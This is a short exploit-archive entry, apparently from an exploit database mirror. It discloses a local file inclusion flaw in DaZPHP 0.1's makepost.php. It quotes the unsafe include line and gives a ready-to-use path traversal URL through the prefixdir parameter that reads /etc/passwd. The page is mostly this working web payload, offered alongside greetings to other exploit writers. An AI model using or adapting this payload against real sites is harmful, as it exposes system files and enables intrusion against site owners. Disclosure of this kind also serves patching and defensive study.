DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability
# Published : 2008-04-02
# Author : w0cker
# Previous Title : Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability
# Next Title : PhpBlock a8.4 (PATH_TO_CODE) Remote File Inclusion Vulnerability

Script Name : DaZPHP

Download : http://sourceforge.net/project/showfiles.php?group_id=132192
Vul Code[Example] : http://[site]/[Path]/makepost.php?prefixdir=../../../../../../etc/passwd

Error : include "./".$prefixdir."/DaZPHPNews-0.1-1/makepost.php";
Greetz : Kezzap66345 - Str0ke - Dread 35

# www.Syue.com [2008-04-02]